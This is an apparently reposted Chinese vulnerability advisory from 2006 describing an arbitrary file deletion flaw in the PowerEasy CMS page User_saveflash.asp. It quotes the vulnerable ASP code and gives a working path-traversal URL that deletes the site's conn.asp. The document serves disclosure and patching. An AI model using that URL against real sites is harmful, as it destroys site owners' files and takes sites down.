动易网站管理系统User\User_saveflash.asp页面存在任意文件删除漏洞

鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。

h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!

信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )

发布日期:2006-12-20 应急事件响应公告(BCTCERA0612)

受影响系统:动易网站管理系统所有版本

安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。

漏洞描述:User\User_saveflash.asp文件第97行

whichfile=trim(request("color_url"))

Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)
rline = Colortxt.ReadLine
badwords = split(rline,"|")
Colortxt.Close

fso.deleteFile(server.mappath(whichfile))

此代码的位于第79行的CoverColorFile过程,触发条件在第16行,代码如下:

act = trim(request("act"))
If act="" Then
Call Main()
Else
Call CoverColorFile()
End If

此漏洞可以在构造合理的act和color_url后可以删除任何文件

测试方法:构造如下语句,可以删除conn.asp文件:User/User_saveflash.asp?act=aa&color_url=../conn.asp

解决方案:对于没有做好过滤的部分,进行严格的过滤以及修补工作。在有文件读写操作的地方,对客户端抱不信任的态度。

关于Bug.Center.Team:
Bug.Center.Team(又名:漏洞预警中心小组)是国内较早成立的以脚本安全为主要方向的网络安全组织,致力于网络和脚本安全问题的研究,在对于脚本程序的修补、维护、漏洞检测都有专业水平,是国内最专业、最经验的安全服务组织,有关Bug.Center.Team的详情请参见: http://www.cnbct.org

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

  • 那我就填吧。。。

    这个不填成不成

发表评论